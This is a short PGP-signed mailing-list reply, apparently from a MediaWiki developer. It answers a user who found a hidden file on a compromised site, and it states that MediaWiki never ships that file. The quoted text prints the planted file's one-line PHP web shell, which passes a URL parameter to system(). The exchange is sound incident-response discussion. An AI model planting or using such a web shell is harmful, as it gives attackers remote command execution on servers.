-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Itay Ophir wrote:
| We managed to find and hopefully resolve this security hole.
|
| It was not the index.php.
|
| It was the /config/.info.php In that file there is the following line:
|
| <?php system($_GET["id"]) ?>
MediaWiki does not contain or produce any such file.
- -- brion vibber (brion @
wikimedia.org)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla -
http://enigmail.mozdev.org
iEYEARECAAYFAkfarU8ACgkQwRnhpk1wk44sPwCfWwjEGXE1u6E0k4DtP+8infgP
HDgAoL9uIXjokH4SrY5bU2OTp7L+c2Vp
=nFrt
-----END PGP SIGNATURE-----